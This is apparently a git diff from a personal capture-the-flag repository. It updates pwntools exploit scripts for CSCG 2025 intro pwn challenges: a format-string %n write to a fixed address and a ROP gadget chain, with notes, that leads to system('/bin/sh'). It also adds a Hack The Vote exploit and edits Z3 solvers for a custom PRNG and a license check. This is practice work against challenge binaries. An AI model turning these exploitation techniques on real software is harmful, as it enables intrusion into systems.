diff --git a/.gitignore b/.gitignore index b7eb8c7..a7c1287 100644 --- a/.gitignore +++ b/.gitignore @@ -11,3 +11,5 @@ insomnihack24/web/mathematical/.venv/ .venv __pycache__ + +core.* diff --git a/cscg25/pwn/intro2/core.3724068 b/cscg25/pwn/intro2/core.3724068 deleted file mode 100644 index 23c1f18..0000000 Binary files a/cscg25/pwn/intro2/core.3724068 and /dev/null differ diff --git a/cscg25/pwn/intro2/core.3737878 b/cscg25/pwn/intro2/core.3737878 deleted file mode 100644 index 8020e07..0000000 Binary files a/cscg25/pwn/intro2/core.3737878 and /dev/null differ diff --git a/cscg25/pwn/intro2/exploit.py b/cscg25/pwn/intro2/exploit.py index 06e726f..eb17bb8 100644 --- a/cscg25/pwn/intro2/exploit.py +++ b/cscg25/pwn/intro2/exploit.py @@ -9,7 +9,7 @@ LOCAL = True # Change to False if connecting remotely if LOCAL: p = process(context.binary.path) else: - p = remote("39d9389ef3a77235a475377e-1024-intro-pwn-2.challenge.cscg.live", 1337, ssl=True)# Define functions for convenience + p = remote("75143f5062f22bfeb9302387-1024-intro-pwn-2.challenge.cscg.live", 1337, ssl=True)# Define functions for convenience def send_payload(payload): p.sendline(payload) @@ -21,11 +21,22 @@ def interact(): bug_addr = 0x40406c + # Example interaction recv_until(b'What is your name?') -payload = b"%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n" + +format_string = b"" +format_string += b"%0.0s" * 5 +format_string += b"%0.0s" * 10 +format_string += b"%n" +format_string += b"\n" * (8 - (len(format_string) % 8)) +print(len(format_string) / 8) +format_string += p64(bug_addr) + +print(format_string) + print("enter if gdb attached") input() -send_payload(payload) +send_payload(format_string) interact() # Keep the shell open diff --git a/cscg25/pwn/intro3/core.3891920 b/cscg25/pwn/intro3/core.3891920 deleted file mode 100644 index f359419..0000000 Binary files a/cscg25/pwn/intro3/core.3891920 and /dev/null differ diff --git a/cscg25/pwn/intro3/core.3892192 b/cscg25/pwn/intro3/core.3892192 deleted file mode 100644 index 40fb581..0000000 Binary files a/cscg25/pwn/intro3/core.3892192 and /dev/null differ diff --git a/cscg25/pwn/intro3/core.3892488 b/cscg25/pwn/intro3/core.3892488 deleted file mode 100644 index 578d204..0000000 Binary files a/cscg25/pwn/intro3/core.3892488 and /dev/null differ diff --git a/cscg25/pwn/intro3/core.3916686 b/cscg25/pwn/intro3/core.3916686 deleted file mode 100644 index 9cec91b..0000000 Binary files a/cscg25/pwn/intro3/core.3916686 and /dev/null differ diff --git a/cscg25/pwn/intro3/exploit.py b/cscg25/pwn/intro3/exploit.py index c5d67e4..bb24815 100644 --- a/cscg25/pwn/intro3/exploit.py +++ b/cscg25/pwn/intro3/exploit.py @@ -39,7 +39,7 @@ def interact(): ropchain = [ - b"3", b"2", b"6", b"13", b"12", b"11", b"1", b"-1" + b"3", b"2", b"6", b"13", b"12", b"-1" ] diff --git a/cscg25/pwn/intro3/notes.md b/cscg25/pwn/intro3/notes.md index c7e9c8d..17e6187 100644 --- a/cscg25/pwn/intro3/notes.md +++ b/cscg25/pwn/intro3/notes.md @@ -7,5 +7,4 @@ r10 = binsh_puts_diff 6 -> rax = 0, rsi = 0 13 -> rdi = trash, rsi = puts 12 -> rcx = binsh -11 -> r8 = r9, r9 = r8 -1 -> rbx = system + diff --git a/hackthevote/pwn/comma-club/exploit.py b/hackthevote/pwn/comma-club/exploit.py new file mode 100644 index 0000000..6721adf --- /dev/null +++ b/hackthevote/pwn/comma-club/exploit.py @@ -0,0 +1,20 @@ + +# A custom template for binary exploitation that uses pwntools. +# Examples: +# python exploit.py DEBUG NOASLR GDB +# python exploit.py DEBUG REMOTE + +from pwn import * + +with process("./challenge") as p: + print(p.recvuntil(b'>').decode()) + p.sendline("1".encode()) + print(p.recvuntil(b'>').decode()) + for i in range(3000): + p.sendline("1".encode()) + print(p.recvuntil(b'>').decode()) + p.sendline(b"584057") + print(p.recvline()) + p.interactive() + + diff --git a/training/IntroZ3/tasks/chall2_dreamer/exploit.py b/training/IntroZ3/tasks/chall2_dreamer/exploit.py index 6095d07..6e1859a 100644 --- a/training/IntroZ3/tasks/chall2_dreamer/exploit.py +++ b/training/IntroZ3/tasks/chall2_dreamer/exploit.py @@ -6,10 +6,17 @@ import sys def ROL(X, N): - return ((((X) << (N)) | ((X) >> (64 - (N)))) % (2 ** 64)) + if isinstance(X, z3.BitVecRef): + return z3.RotateLeft(X,N) + else: + return ((((X) << (N)) | ((X) >> (64 - (N)))) % (2 ** 64)) + def ROR(X, N): - return ((((X) >> (N)) | ((X) << (64 - (N)))) % (2 ** 64)) + if isinstance(X, z3.BitVecRef): + return z3.RotateRight(X,N) + else: + return ((((X) >> (N)) | ((X) << (64 - (N)))) % (2 ** 64)) def custom_random(state): NEW_STATE = ROL(state,30) ^ ROR(state,12) ^ ROL(state,42) ^ ROL(state,4) ^ ROR(state,5); diff --git a/training/IntroZ3/tasks/chall2_dreamer/test.py b/training/IntroZ3/tasks/chall2_dreamer/test.py index 267d71b..0cbb59c 100644 --- a/training/IntroZ3/tasks/chall2_dreamer/test.py +++ b/training/IntroZ3/tasks/chall2_dreamer/test.py @@ -24,6 +24,7 @@ def get_seed_for_sequence(bytesequence): s = z3.Solver() base_state = z3.BitVec("base_state", 64) cur_state = base_state + s.add(base_state > 0) for byte in bytesequence: gen_byte, cur_state = custom_random(cur_state) s.add(gen_byte == byte) @@ -44,7 +45,7 @@ def gen_sequence(seed, length): return bytes(r) -test = random.getrandbits(32).to_bytes(4) +test = random.getrandbits(32).to_bytes(4, "little") seed = get_seed_for_sequence(test) print(seed) print(test) diff --git a/training/IntroZ3/tasks/chall3_archventure/README.md b/training/IntroZ3/tasks/chall3_archventure/README.md index 56e781a..bcbeb77 100644 --- a/training/IntroZ3/tasks/chall3_archventure/README.md +++ b/training/IntroZ3/tasks/chall3_archventure/README.md @@ -7,10 +7,10 @@ The license key has the form XXXXX-XXXXX-XXXXX-XXXXX The template code will mostly ignore the '-' (since the binary does it mostly as well) and `license[5]` will refer to the 6th X For context: - - The binary will perform some general constraint checks on the license - - The binary will extract 4 binaries of different architectures that each contain different parts of a constraint set and are then executed - - The constraints are described in the template and the relevant arrays extracted already +- The binary will perform some general constraint checks on the license +- The binary will extract 4 binaries of different architectures that each contain different parts of a constraint set and are then executed + - The constraints are described in the template and the relevant arrays extracted already To validate your license key, run the binary (it requires qemu and some dependencies, so using the Dockerfile might be easiest):